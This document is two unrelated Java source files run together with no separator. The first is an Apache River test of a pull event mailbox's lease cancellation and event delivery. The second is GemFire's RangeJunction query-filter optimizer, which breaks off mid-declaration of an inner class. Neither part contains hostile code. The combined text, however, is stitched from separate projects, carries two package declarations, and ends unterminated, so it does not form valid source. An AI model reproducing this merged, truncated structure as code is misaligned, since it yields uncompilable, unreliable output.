/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.river.test.spec.eventmailbox;
import java.util.logging.Level;
import java.rmi.RemoteException;
import java.rmi.NoSuchObjectException;
import java.rmi.ServerException;
import java.util.Date;
import org.apache.river.qa.harness.TestException;
import org.apache.river.qa.harness.QAConfig;
import net.jini.event.InvalidIteratorException;
import net.jini.event.RemoteEventIterator;
import net.jini.event.PullEventMailbox;
import net.jini.event.MailboxPullRegistration;
import net.jini.event.EventMailbox;
import net.jini.event.MailboxRegistration;
import net.jini.core.lease.Lease;
import net.jini.core.lease.UnknownLeaseException;
import net.jini.core.event.EventRegistration;
import net.jini.core.event.RemoteEvent;
import net.jini.core.event.RemoteEventListener;
import net.jini.io.MarshalledInstance;
import org.apache.river.constants.TimeConstants;
import org.apache.river.qa.harness.Test;
import org.apache.river.test.impl.mercury.EMSTestBase;
import org.apache.river.test.impl.mercury.TestUtils;
import org.apache.river.test.impl.mercury.TestListener;
import org.apache.river.test.impl.mercury.TestPullListener;
import org.apache.river.test.impl.mercury.TestPullListenerImpl;
import org.apache.river.test.impl.mercury.TestGenerator;
public class EMSRIFT_PULL extends EMSTestBase implements TimeConstants {
//
// This should be long enough to sensibly run the test.
// If the service doesn't grant long enough leases, then
// we might have to resort to using something like the
// LeaseRenewalManager to keep our leases current.
//
private final long DURATION1 = 3*MINUTES;
private final int NUM_EVENTS = 5;
private final long EVENT_ID = 1234;
private final long MAX_WAIT = 60 * 1000;
public void run() throws Exception {
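// Test outline: register with the pull mailbox and verify its lease, wire a
// test generator to the mailbox-provided listener, generate events and verify
// they are collected (and that bogus events are not), then cancel the
// registration lease and confirm that further use of the registration, its
// lease, and its remote event iterator fails as expected.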
PullEventMailbox mb = getPullMailbox();
int i = 0;
// Register and check lease
MailboxPullRegistration mr = getPullRegistration(mb, DURATION1);
Lease mrl = getPullMailboxLease(mr);
checkLease(mrl, DURATION1);
logger.log(Level.INFO, "Mailbox lease good until"
+ new Date(mrl.getExpiration()));
// Get the mailbox service provided listener
RemoteEventListener mbRel = getPullMailboxListener(mr);
// Create an event generator and pass it the
// mailbox's remote event listener.
TestGenerator myGen = TestUtils.createGenerator(getManager());
EventRegistration evtReg =
myGen.register(EVENT_ID, // Event ID to use
null, // handback
mbRel, // Notification target
DURATION1); // Lease duration
Lease tgl = evtReg.getLease();
checkLease(tgl, DURATION1);
// Create "listener" to collect events for this test
TestPullListener tpl = TestUtils.createPullListener(getManager());
int eventCount = 0;
// Generate some events
logger.log(Level.INFO, "Generating " + NUM_EVENTS + " events");
RemoteEvent[] events = new RemoteEvent[NUM_EVENTS];
for (i = 0; i < NUM_EVENTS; i++) {
events[i] = myGen.generateEvent(evtReg.getID(), 3);
}
RemoteEvent[] bogus = {
new RemoteEvent(myGen, 9999, 9999, (MarshalledInstance) null),
new RemoteEvent(myGen, 5678, 1234, (MarshalledInstance) null),
};
logger.log(Level.INFO, "Wating for event delivery");
eventCount = NUM_EVENTS;
getCollectedRemoteEvents(tpl, mr, eventCount, MAX_WAIT);
logger.log(Level.INFO, "Verifying event delivery count of " + eventCount);
assertCount(tpl, eventCount);
logger.log(Level.INFO, "Verifying events ");
assertEvents(tpl, events);
if(tpl.verifyEvents(bogus)) {
throw new TestException("Successfully verified bogus events");
}
// Get iterator handle before cancelling associated reg
RemoteEventIterator rei = mr.getRemoteEvents();
logger.log(Level.INFO, "Cancelling registration lease");
mrl.cancel();
logger.log(Level.INFO, "Generating " + NUM_EVENTS + " more events");
try {
for (i = 0; i < NUM_EVENTS; i++) {
events[i] = myGen.generateEvent(evtReg.getID(), 3);
}
} catch (ServerException se) {
Throwable detail = se.getCause();
if (detail != null &&
detail instanceof NoSuchObjectException) {
// can safely ignore this since we expect
// that the registration has expired.
logger.log(Level.INFO, "Caught NoSuchObjectException - expected");
} else { throw se; }
}
// Would like to assert that the event count hasn't changed, but
// invoking getRemoteEvents should fail with NSOE, as above.
try {
logger.log(Level.INFO, "Re-cancelling registration lease");
mrl.cancel();
throw new TestException("Successfully cancelled a cancelled registration");
} catch (UnknownLeaseException ule) {
logger.log(Level.INFO, "Caught UnknownLeaseException - expected");
}
try {
logger.log(Level.INFO, "Calling getRemoteEvents on expired reg");
mr.getRemoteEvents();
throw new TestException("Successfully called a cancelled registration");
} catch (NoSuchObjectException nsoe) {
logger.log(Level.INFO, "Caught NoSuchObjectException - expected");
}
try {
logger.log(Level.INFO, "Calling addUnknownEvents on expired reg");
mr.addUnknownEvents(new java.util.ArrayList());
throw new TestException("Successfully called a cancelled registration");
} catch (NoSuchObjectException nsoe) {
logger.log(Level.INFO, "Caught NoSuchObjectException - expected");
}
logger.log(Level.INFO, "Calling next() on expired reg iterator");
RemoteEvent re;
boolean done = false;
int exceptionCount = 0;
while (!done) {
try {
re = rei.next(MAX_WAIT);
if (re != null) {
logger.log(Level.INFO, "Got RemoteEvent", re);
} else {
throw new TestException(
"Successfully iterated through an expired iter ref");
}
} catch (NoSuchObjectException nsoe) {
logger.log(Level.INFO, "Caught NoSuchObjectException - expected");
done = true;
} catch (RemoteException rex) {
// log and retry
logger.log(Level.INFO, "Caught RemoteException", rex);
if (exceptionCount++ >= 10) {
throw new TestException(
"Too many remote exceptions received");
}
}
}
logger.log(Level.INFO, "Calling close() on expired reg iterator");
rei.close();
try {
logger.log(Level.INFO, "Calling close() again on expired reg iterator");
rei.close();
throw new TestException("Successfully called a close twice");
} catch (InvalidIteratorException iie) {
logger.log(Level.INFO, "Caught InvalidIteratorException - expected");
}
}
/**
* Invokes the parent's construct method and the parser.
* @exception TestException will usually indicate an "unresolved"
* condition because at this point the test has not yet begun.
*/
public Test construct(QAConfig config) throws Exception {
super.construct(config);
parse();
return this;
}
}
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
/*
* Created on Jan 27, 2008
*/
package com.gemstone.gemfire.cache.query.internal;
import java.util.ArrayList;
import java.util.Collections;
import java.util.HashSet;
import java.util.Iterator;
import java.util.List;
import java.util.Set;
import com.gemstone.gemfire.cache.query.AmbiguousNameException;
import com.gemstone.gemfire.cache.query.FunctionDomainException;
import com.gemstone.gemfire.cache.query.Index;
import com.gemstone.gemfire.cache.query.NameResolutionException;
import com.gemstone.gemfire.cache.query.QueryInvocationTargetException;
import com.gemstone.gemfire.cache.query.QueryService;
import com.gemstone.gemfire.cache.query.SelectResults;
import com.gemstone.gemfire.cache.query.Struct;
import com.gemstone.gemfire.cache.query.TypeMismatchException;
import com.gemstone.gemfire.internal.i18n.LocalizedStrings;
import com.gemstone.gemfire.cache.query.internal.parse.OQLLexerTokenTypes;
import com.gemstone.gemfire.cache.query.internal.types.StructTypeImpl;
import com.gemstone.gemfire.cache.query.internal.types.TypeUtils;
import com.gemstone.gemfire.cache.query.types.ObjectType;
import com.gemstone.gemfire.cache.query.types.StructType;
/**
* This structure contains all the filter evaluatable CompiledComparison
* conditions which use the same index. Presently this object is formed only if
* the junction is an AND, and it will either be part of a GroupJunction or be a
* stand-alone junction. If it is a stand-alone junction, it can possibly have a
* non-null iter operand, so that it can be evaluated along with the
* expansion/truncation of the index result.
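* For example (an illustrative, hypothetical query), assuming an index on p.ID,
* a where clause such as p.ID &gt; 5 AND p.ID &lt; 10 AND p.ID != 7 would have
* all three comparisons grouped into a single RangeJunction, since they are
* filter evaluatable against the same index.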
*
* @author asif
*/
public class RangeJunction extends AbstractGroupOrRangeJunction {
private final static int RANGE_SIZE_ESTIMATE = 3;
//moved to AbstractGroupOrRangeJunction
//private CompiledValue iterOperands;
RangeJunction(int operator, RuntimeIterator[] indpndntItr,
boolean isCompleteExpansion, CompiledValue[] operands) {
super(operator, indpndntItr, isCompleteExpansion, operands);
}
void addUnevaluatedFilterOperands(List unevaluatedFilterOps) {
throw new UnsupportedOperationException("This method should not have been invoked");
}
// moved to AbstractGroupOrRangeJunction
/* void addIterOperands(CompiledValue iterOps) {
this.iterOperands = iterOps;
}*/
private RangeJunction(AbstractGroupOrRangeJunction oldGJ,
boolean completeExpansion, RuntimeIterator indpnds[], CompiledValue iterOp) {
super(oldGJ, completeExpansion, indpnds, iterOp);
}
@Override
AbstractGroupOrRangeJunction recreateFromOld(boolean completeExpansion,
RuntimeIterator indpnds[], CompiledValue iterOp) {
return new RangeJunction(this, completeExpansion, indpnds, iterOp);
}
@Override
AbstractGroupOrRangeJunction createNewOfSameType(int operator,
RuntimeIterator[] indpndntItr, boolean isCompleteExpansion,
CompiledValue[] operands) {
return new RangeJunction(operator, indpndntItr, isCompleteExpansion,
operands);
}
@Override
public PlanInfo getPlanInfo(ExecutionContext context)
throws FunctionDomainException, TypeMismatchException,
NameResolutionException, QueryInvocationTargetException {
/*
* This function is called only if the RangeJunction is part of a GroupJunction.
* It is invoked in the organizeOperands method of GroupJunction. In that case it
* is guaranteed that all the operands are filter operands using the same index,
* so there is zero possibility of the first operand being either an iter
* operand or a constant, since those types of operands would be part of the
* GroupJunction itself.
*/
return this._operands[0].getPlanInfo(context);
}
public boolean isConditioningNeededForIndex(RuntimeIterator independentIter, ExecutionContext context, boolean completeExpnsNeeded) throws AmbiguousNameException, TypeMismatchException, NameResolutionException {
return true;
}
public int getOperator() {
return LITERAL_and;
}
public boolean isBetterFilter(Filter comparedTo, ExecutionContext context, final int thisSize) throws FunctionDomainException, TypeMismatchException, NameResolutionException, QueryInvocationTargetException
{
// If the current filter is equality based and the comparedTo filter is also equality based,
// then the one with the lower size estimate is the better one.
boolean isThisBetter = true;
// Go with the lowest cost when a hint is used.
if (context instanceof QueryExecutionContext && ((QueryExecutionContext)context).hasHints()) {
return thisSize <= comparedTo.getSizeEstimate(context);
}
int thatOperator = comparedTo.getOperator() ;
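// For example, an equality filter (TOK_EQ) is preferred over this range filter,
// while single-condition inequalities lose to the (possibly bounded) range.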
switch(thatOperator) {
case TOK_EQ:
isThisBetter = false;
break;
case TOK_NE:
case TOK_NE_ALT:
//Give preference to Range
break;
case LITERAL_and:
// Asif: What to do? For want of a better estimate, treat the current filter as the better one.
break;
case TOK_LE:
case TOK_LT:
case TOK_GE:
case TOK_GT:
// Give preference to this rather than single-condition inequalities, as a RangeJunction
// would possibly be bounded, resulting in fewer values
break;
default :
throw new IllegalArgumentException("The operator type ="+ thatOperator + " is unknown");
}
return isThisBetter;
}
/**
* Segregates the operands of the RangeJunction into iter evaluatable and
* filter evaluatable.
*/
@Override
OrganizedOperands organizeOperands(ExecutionContext context)
throws FunctionDomainException, TypeMismatchException,
NameResolutionException, QueryInvocationTargetException {
// get the list of operands to evaluate,
// and evaluate operands that can use indexes first
if (getOperator() == LITERAL_and) {
return organizeOperandsForAndJunction(context);
}
else {
throw new IllegalStateException(
LocalizedStrings.RangeJunction_IN_THE_CASE_OF_AN_OR_JUNCTION_A_RANGEJUNCTION_SHOULD_NOT_BE_FORMED_FOR_NOW.toLocalizedString());
}
}
// TODO: Asif: Currently a condition such as a != null AND a = 3 would be evaluated
// via intersection. This needs to be optimized, but since it is not a common use
// case (the != null operand is not a required operand), the optimization is being
// ignored for the time being.
/**
* For the filter evaluatable conditions, it creates the appropriate junction
* evaluator (NotEqualConditionEvaluator, SingleCondnEvaluator or
* DoubleCondnRangeJunctionEvaluator). The junction evaluator itself is filter
* evaluatable. Operands of the form != null, == null, != undefined and
* == undefined are left as is and are not combined into a junction evaluator.
* Thus the organized operands of a RangeJunction may contain at most one
* condition evaluator, while retaining the operands containing null or
* undefined conditions. If there is an equality condition, it may result in a
* filter consisting of just that condition, assuming the other conditions
* satisfy the equality. If it turns out that the conditions are mutually
* exclusive, the organized operands will just contain a single filter
* evaluatable CompiledLiteral (false), indicating an empty result set.
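* Illustrative (hypothetical) examples on an indexed field a: the conditions
* a &gt;= 5 AND a &lt;= 5 AND a = 5 collapse into the single equality filter
* a = 5, whereas a &gt; 10 AND a &lt; 5 are mutually exclusive and yield a
* filter evaluatable CompiledLiteral (false).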
*/
private OrganizedOperands organizeOperandsForAndJunction(
ExecutionContext context) throws AmbiguousNameException,
FunctionDomainException, TypeMismatchException, NameResolutionException,
QueryInvocationTargetException {
List evalOperands = new ArrayList(_operands.length);
int evalCount = 0;
int lessCondnOp = -1;
int greaterCondnOp = -1;
CompiledComparison lessCondnOperand = null;
CompiledComparison greaterCondnOperand = null;
CompiledComparison equalCondnOperand = null;
Object equalCondKey = null;
Object lessCondnKey = null;
Object greaterCondnKey = null;
boolean emptyResults = false;
Set notEqualTypeKeys = null;
boolean possibleRangeFilter = false;
IndexInfo indxInfo = null;
for (int i = 0; i < _operands.length; i++) {
CompiledValue operand = _operands[i];
if (operand.getPlanInfo(context).evalAsFilter) {
Indexable cc = (Indexable)operand;
if (indxInfo == null) {
indxInfo = cc.getIndexInfo(context)[0];
}
// TODO: Asif: Try to ensure that a CompiledUndefined never
// goes into the RangeJunction. That means modifying the
// CompiledJunction code to avoid CompiledUndefined's inclusion.
// That way we can ensure that only CompiledComparisons become
// part of a RangeJunction.
if (!cc.isRangeEvaluatable()) {
evalCount++;
evalOperands.add(0, _operands[i]);
continue;
}
CompiledValue ccKey = ((CompiledComparison)cc).getKey(context);
Object evaluatedCCKey = ccKey.evaluate(context);
int operator = ((CompiledComparison)cc).reflectOnOperator(ccKey);
if (evaluatedCCKey == null) {
evalCount++;
evalOperands.add(0, _operands[i]);
continue;
}
if (equalCondnOperand != null) {
emptyResults = !isConditionSatisfied(equalCondKey, evaluatedCCKey,
operator);
if (emptyResults) {
break;
}
else {
continue;
}
}
switch (operator) {
case TOK_EQ:
possibleRangeFilter = false;
equalCondnOperand = (CompiledComparison)cc;
equalCondKey = evaluatedCCKey;
break;
case TOK_NE:
case TOK_NE_ALT:
possibleRangeFilter = true;
if (notEqualTypeKeys == null) {
notEqualTypeKeys = new HashSet(_operands.length);
}
evaluatedCCKey = TypeUtils.indexKeyFor(evaluatedCCKey);
notEqualTypeKeys.add(evaluatedCCKey);
break;
case TOK_GE:
case TOK_GT:
possibleRangeFilter = true;
if (greaterCondnOperand == null) {
greaterCondnOperand = (CompiledComparison)cc;
greaterCondnKey = evaluatedCCKey;
greaterCondnOp = operator;
}
else {
if (isConditionSatisfied(evaluatedCCKey, greaterCondnKey,
greaterCondnOp)) {
greaterCondnKey = evaluatedCCKey;
greaterCondnOperand = (CompiledComparison)cc;
greaterCondnOp = operator;
}
}
break;
case TOK_LE:
case TOK_LT:
// Asif: if a previous equality operand exists and its value is greater
// than the current condition's value, the results will be empty
possibleRangeFilter = true;
if (lessCondnOperand == null) {
lessCondnOperand = (CompiledComparison)cc;
lessCondnKey = evaluatedCCKey;
lessCondnOp = operator;
}
else {
if (isConditionSatisfied(evaluatedCCKey, lessCondnKey, lessCondnOp)) {
lessCondnKey = evaluatedCCKey;
lessCondnOperand = (CompiledComparison)cc;
lessCondnOp = operator;
}
}
break;
}
}
else if (!_operands[i].isDependentOnCurrentScope(context)) {
// TODO: Asif: Remove this assert & else-if condition after successful
// testing of the build
Support
.assertionFailed("An independent operand should never be present as an operand inside a GroupJunction, as it should always be present only in CompiledJunction");
}
else {
evalOperands.add(_operands[i]);
}
}
if (!emptyResults) {
Filter filter = null;
if (equalCondnOperand != null) {
// Check if any of the preceding inequality operands that have not been
// checked against the equality operand are unable to satisfy the
// equality.
if (lessCondnOperand != null
&& !this.isConditionSatisfied(equalCondKey, lessCondnKey,
lessCondnOp)) {
emptyResults = true;
}
else if (greaterCondnOperand != null
&& !this.isConditionSatisfied(equalCondKey, greaterCondnKey,
greaterCondnOp)) {
emptyResults = true;
}
else if (notEqualTypeKeys != null) {
Iterator itr = notEqualTypeKeys.iterator();
while (itr.hasNext() && !emptyResults) {
emptyResults = !this.isConditionSatisfied(equalCondKey, itr.next(),
OQLLexerTokenTypes.TOK_NE);
}
}
if (!emptyResults) {
filter = equalCondnOperand;
}
}
else if (possibleRangeFilter) {
if (lessCondnOperand != null && greaterCondnOperand != null) {
emptyResults = !checkForRangeBoundednessAndTrimNotEqualKeyset(
notEqualTypeKeys, lessCondnKey, lessCondnOp, greaterCondnKey,
greaterCondnOp);
if (!emptyResults) {
filter = new DoubleCondnRangeJunctionEvaluator(lessCondnOp,
lessCondnKey, greaterCondnOp, greaterCondnKey,
(notEqualTypeKeys == null || notEqualTypeKeys.isEmpty()) ? null
: notEqualTypeKeys, indxInfo);
}
}
else if (greaterCondnOperand != null) {
filter = generateSingleCondnEvaluatorIfRequired(notEqualTypeKeys,
greaterCondnOperand, greaterCondnOp, greaterCondnKey, indxInfo);
}
else if (lessCondnOperand != null) {
filter = generateSingleCondnEvaluatorIfRequired(notEqualTypeKeys,
lessCondnOperand, lessCondnOp, lessCondnKey, indxInfo);
}
else {
assert notEqualTypeKeys != null && !notEqualTypeKeys.isEmpty();
// TODO: Asif: Ideally, if there is a single not-equal key we should not
// create a NotEqualConditionEvaluator but instead just add the
// CompiledComparison operand to the eval operands list. But since we do
// not retain the operand corresponding to the not-equal key in this
// function, we are creating the NotEqualConditionEvaluator.
filter = new NotEqualConditionEvaluator(notEqualTypeKeys, indxInfo);
}
}
if (emptyResults) {
evalOperands.clear();
evalCount = 1;
evalOperands.add(new CompiledLiteral(Boolean.FALSE));
}
else if (filter != null) {
evalCount++;
evalOperands.add(0, filter);
}
}
else {
// Asif: Create a new CompiledLiteral with boolean false
evalOperands.clear();
evalCount = 1;
evalOperands.add(new CompiledLiteral(Boolean.FALSE));
}
//If no hints were provided, we continue with our single index solution
if (!(context instanceof QueryExecutionContext) || !((QueryExecutionContext)context).hasMultiHints()) {
// At the end, check whether the unevaluated iter operands are null or not.
// They can be non-null only if, at the top level, a GroupJunction is formed
// containing multiple RangeJunctions and other iter operands, and only one
// RangeJunction is treated as the filter with the rest treated as iter
// operands. In that case, the only iter operand is the one added externally
// to the RangeJunction. If the top level was itself a RangeJunction, the iter
// operands would already have been part of it at creation time and we would
// not have to add them externally.
if(getIterOperands() != null) {
// Commented out the assert for CompiledLike, which creates 2 or 3 CompiledComparisons
// for the same operand. The protGetPlanInfo in CompiledLike could return evalAsFilter
// as true the first time and false the next time for the same operand.
// Hence evalOperands could contain more CompiledComparisons than the number of indexes.
// Support.Assert(evalOperands.size() == evalCount);
evalOperands.add(getIterOperands());
}
}
return createOrganizedOperandsObject(evalCount, evalOperands);
}
/**
* Checks if key1 operator key2 is true or not. The operator could be =, !=, &lt;, &gt;, &lt;= or &gt;=.
*
* @param key1
* @param key2
* @param operator
* @return boolean true if the condition is satisfied else false
* @throws TypeMismatchException
*/
private boolean isConditionSatisfied(Object key1, Object key2, int operator)
throws TypeMismatchException {
return ((Boolean)TypeUtils.compare(key1, key2, operator)).booleanValue();
}
/**
* Checks if the range junction containing 'less' and 'greater' type inequalities
* has a lower and an upper bound, in the sense that they do not represent a
* mutually exclusive condition such as a &gt; 10 and a &lt; 9. If the condition
* is bounded in nature, it further checks whether each 'not equal' type key
* falls within the bounded range, and removes from the not-equal key set any
* key that does not.
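* Illustrative (hypothetical) example: a &gt; 8 AND a &lt; 12 with not-equal
* keys {10, 20} is bounded, and 20 is trimmed because it can never fall inside
* the range, whereas a &gt; 10 AND a &lt; 9 is unbounded (mutually exclusive)
* and the method returns false.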
*
* @param notEqualKeys
* Set containing keys of operands having 'Not Equal' (!=) type
* conditions
* @param lessCondnKey
* Key of the 'Less' condition operand
* @param lessOperator
* Type of 'less' operator ( < or <=)
* @param greaterCondnKey
* Key of the 'greater' condition operand
* @param greaterCondnOp
* Type of 'greater' operator ( > or >=)
* @return boolean true if the nature is bounded else false ( unbounded )
* @throws TypeMismatchException
*/
private boolean checkForRangeBoundednessAndTrimNotEqualKeyset(
Set notEqualKeys, Object lessCondnKey, int lessOperator,
Object greaterCondnKey, int greaterCondnOp) throws TypeMismatchException {
// First check if the range is bounded or (unbounded and mutually
// exclusive). If it is unbounded, immediately return false.
if (isConditionSatisfied(greaterCondnKey, lessCondnKey, lessOperator)
&& isConditionSatisfied(lessCondnKey, greaterCondnKey, greaterCondnOp)) {
// Now remove those not-equal conditions which do not satisfy the range
if (notEqualKeys != null) {
Iterator itr = notEqualKeys.iterator();
Object neKey = null;
while (itr.hasNext()) {
neKey = itr.next();
if (!this
.isConditionSatisfied(neKey, greaterCondnKey, greaterCondnOp)
|| !this.isConditionSatisfied(neKey, lessCondnKey, lessOperator)) {
itr.remove();
}
}
}
return true;
}
else {
return false;
}
}
/**
* Creates a Filter of type SingleCondnEvaluator if there exists at least one
* key of type "NOT EQUAL" which satisfies the 'less' or 'greater' type
* operand. Otherwise the Filter is nothing but the CompiledComparison
* representing the 'less' or 'greater' inequality.
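* Illustrative (hypothetical) example: for a &gt; 7 with not-equal keys {3, 9},
* the key 3 can never satisfy a &gt; 7 and is dropped while 9 is retained, so a
* SingleCondnEvaluator is returned; if no not-equal key survives, the plain
* CompiledComparison for a &gt; 7 is returned as the filter.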
*
* @param notEqualKeys
* Set containing NotEqual type Keys
* @param operand
* CompiledValue representing the 'Less' or 'Greater' operand
* @param operator
* Type of 'Less' or 'Greater' operand
* @param condnKey
* The Key corresponding to the Operand representing the 'Less'
* or 'Greater' inequality
* @param indxInfo
* The IndexInfo object for this RangeJunction
* @return Filter object of type CompiledComparison or
* RangeJunction.SingleCondnEvaluator object
* @throws TypeMismatchException
*/
private Filter generateSingleCondnEvaluatorIfRequired(Set notEqualKeys,
CompiledValue operand, int operator, Object condnKey, IndexInfo indxInfo)
throws TypeMismatchException {
Filter rangeFilter;
if (notEqualKeys != null) {
// Eliminate all the not-equal keys which can never be satisfied by
// the given 'less' or 'greater' condition
Iterator itr = notEqualKeys.iterator();
while (itr.hasNext()) {
Object neKey = itr.next();
if (!((Boolean)TypeUtils.compare(neKey, condnKey, operator))
.booleanValue()) {
itr.remove();
}
}
if (notEqualKeys.isEmpty()) {
notEqualKeys = null;
}
}
rangeFilter = (notEqualKeys != null) ? new SingleCondnEvaluator(operator,
condnKey, notEqualKeys, indxInfo) : (Filter)operand;
return rangeFilter;
}
public Object evaluate(ExecutionContext context)
throws FunctionDomainException, TypeMismatchException,
NameResolutionException, QueryInvocationTargetException {
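// Three-valued AND evaluation: a false operand short-circuits to false, a null
// or UNDEFINED operand makes the overall result UNDEFINED unless some later
// operand evaluates to false, and any other non-Boolean operand is an error.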
Object r = _operands[0].evaluate(context); // UNDEFINED, null, or a
// Boolean
// if it's false (and the op in this case will always be AND), return
// false immediately
if (r instanceof Boolean && !((Boolean) r).booleanValue())
return r;
if (r == null || r == QueryService.UNDEFINED)
r = QueryService.UNDEFINED; // keep going to see if we hit a
// short-circuiting truth value
else if (!(r instanceof Boolean))
throw new TypeMismatchException(
"LITERAL_and/LITERAL_or operands must be of type boolean, not type '"
+ r.getClass().getName() + "'");
for (int i = 1; i < _operands.length; i++) {
Object ri = _operands[i].evaluate(context); // UNDEFINED, null, or
// Boolean
if (ri instanceof Boolean && !((Boolean) ri).booleanValue())
return ri;
if (ri == null || ri == QueryService.UNDEFINED
|| r == QueryService.UNDEFINED) {
r = QueryService.UNDEFINED;
continue; // keep going to see if we hit a short-circuiting
// truth value
} else if (!(ri instanceof Boolean))
throw new TypeMismatchException(
"LITERAL_and/LITERAL_or operands must be of type boolean, not type '"
+ ri.getClass().getName() + "'");
// now do the actual and
r = Boolean.valueOf(((Boolean) r).booleanValue()
&& ((Boolean) ri).booleanValue());
}
return r;
}
@Override
public int getType() {
return LITERAL_and;
}
@Override
public void visitNodes(NodeVisitor visitor) {
Support.assertionFailed("Should not have come here");
}
public int getSizeEstimate(ExecutionContext context)
{
//TODO:Asif:Try to estimate better
return RANGE_SIZE_ESTIMATE;
}
/*
* private organizeOperandsForORJunction() {
* }
*/
/**
* Test method which checks if the Filter operand is of type
* SingleCondnEvaluator
*/
static boolean isInstanceOfSingleCondnEvaluator(Object o) {
return o instanceof RangeJunction.SingleCondnEvaluator;
}
/**
* Test method which checks if the Filter operand is of type
* NotEqualConditionEvaluator
*/
static boolean isInstanceOfNotEqualConditionEvaluator(Object o) {
return o instanceof RangeJunction.NotEqualConditionEvaluator;
}
/**
* Test method which checks if the Filter operand is of type
* DoubleCondnRangeJunctionEvaluator
*/
static boolean isInstanceOfDoubleCondnRangeJunctionEvaluator(Object o) {
return o instanceof RangeJunction.DoubleCondnRangeJunctionEvaluator;
}
/**
* Test function which retrieves the "NOT EQUAL KEYS"
*
* @param o
* Object of type NotEqualConditionEvaluator from which the set
* containing the keys for removal need to be retrieved
* @return Unmodifiable Set containing the keys for removal
*/
static Set getKeysToBeRemoved(Object o) {
if (o instanceof NotEqualConditionEvaluator) {
if (((NotEqualConditionEvaluator)o).notEqualTypeKeys == null) {
return null;
}
return Collections
.unmodifiableSet(((NotEqualConditionEvaluator)o).notEqualTypeKeys);
}
else {
throw new IllegalStateException(
LocalizedStrings.
RangeJunction_THE_OBJECT_IS_NOT_OF_TYPE_NOTEQUALCONDITIONEVALUATOR
.toLocalizedString());
}
}
/**
* Test function which retrieves the SingleCondnEvaluator operator
*
* @param o
* Object of type SingleCondnEvaluator from which the
* operator needs to be retrieved
* @return int indicating the operator
*/
static int getSingleCondnEvaluatorOperator(Object o) {
if (o instanceof SingleCondnEvaluator) {
return ((SingleCondnEvaluator)o).condnOp;
}
else {
throw new IllegalStateException(
LocalizedStrings.
RangeJunction_THE_OBJECT_IS_NOT_OF_TYPE_NOTEQUALCONDITIONEVALUATOR
.toLocalizedString());
}
}
/**
* Test function which retrieves the evaluated Key for a SingleCondnEvaluator
* operator
*
* @param o
* Object of type SingleCondnEvaluator from which the
* evaluated key needs to be retrieved
* @return Object representing the evaluated Key
*/
static Object getSingleCondnEvaluatorKey(Object o) {
if (o instanceof SingleCondnEvaluator) {
return ((SingleCondnEvaluator)o).condnKey;
}
else {
throw new IllegalStateException(
LocalizedStrings.
RangeJunction_THE_OBJECT_IS_NOT_OF_TYPE_NOTEQUALCONDITIONEVALUATOR
.toLocalizedString());
}
}
/**
* Test function which retrieves the LESS type evaluated Key for a
* DoubleCondnEvaluator operator
*
* @param o
* Object of type DoubleCondnEvaluator
* @return Object representing the evaluated Key of Less Type
*/
static Object getDoubleCondnEvaluatorLESSKey(Object o) {
if (o instanceof DoubleCondnRangeJunctionEvaluator) {
return ((DoubleCondnRangeJunctionEvaluator)o).lessCondnKey;
}
else {
throw new IllegalStateException(
LocalizedStrings.
RangeJunction_THE_OBJECT_IS_NOT_OF_TYPE_NOTEQUALCONDITIONEVALUATOR
.toLocalizedString());
}
}
/**
* Test function which retrieves the GREATER type evaluated Key for a
* DoubleCondnEvaluator operator
*
* @param o
* Object of type DoubleCondnEvaluator
* @return Object representing the evaluated Key of GREATER Type
*/
static Object getDoubleCondnEvaluatorGreaterKey(Object o) {
if (o instanceof DoubleCondnRangeJunctionEvaluator) {
return ((DoubleCondnRangeJunctionEvaluator)o).greaterCondnKey;
}
else {
throw new IllegalStateException(
LocalizedStrings.
RangeJunction_THE_OBJECT_IS_NOT_OF_TYPE_NOTEQUALCONDITIONEVALUATOR
.toLocalizedString());
}
}
/**
* Test function which retrieves the operator of Less Type
*
* @param o
* Object of type DoubleCondnEvaluator
* @return int indicating the operator of less Type
*/
static int getDoubleCondnEvaluatorOperatorOfLessType(Object o) {
if (o instanceof DoubleCondnRangeJunctionEvaluator) {
return ((DoubleCondnRangeJunctionEvaluator)o).lessCondnOp;
}
else {
throw new IllegalStateException(
LocalizedStrings.
RangeJunction_THE_OBJECT_IS_NOT_OF_TYPE_NOTEQUALCONDITIONEVALUATOR
.toLocalizedString());
}
}
/**
* Test function which retrieves the operator of GREATER Type
*
* @param o
* Object of type DoubleCondnEvaluator
* @return int indicating the operator of GREATER type
*/
static int getDoubleCondnEvaluatorOperatorOfGreaterType(Object o) {
if (o instanceof DoubleCondnRangeJunctionEvaluator) {
return ((DoubleCondnRangeJunctionEvaluator)o).greaterCondnOp;
}
else {
throw new IllegalStateException(
LocalizedStrings.
RangeJunction_THE_OBJECT_IS_NOT_OF_TYPE_NOTEQUALCONDITIONEVALUATOR
.toLocalizedString());
}
}
/**
* Test function which retrieves the underlying Index for a
* NotEqualConditionEvaluator operator
*
* @param o
* Object of type NotEqualConditionEvaluator from which the
* index needs to be retrieved
* @return Index
*/
static Index getIndex(Object o) {
if (o instanceof NotEqualConditionEvaluator) {
return ((NotEqualConditionEvaluator)o).indxInfo._index;
}
else {
throw new IllegalStateException(
LocalizedStrings.
RangeJunction_THE_OBJECT_IS_NOT_OF_TYPE_NOTEQUALCONDITIONEVALUATOR
.toLocalizedString());
}
}
/**
* Filter object created by the RangeJunction on invocation of its
* organizeOperands method. An object of this class is created only if the
* RangeJunction contains more than one 'NOT EQUAL' (!=) type condition
* (apart from conditions having null or undefined as the key). This class is
* also extended by SingleCondnEvaluator and DoubleCondnRangeJunctionEvaluator.
*
* @author asif
*
*/
private static class NotEqualConditionEvaluator extends AbstractCompiledValue
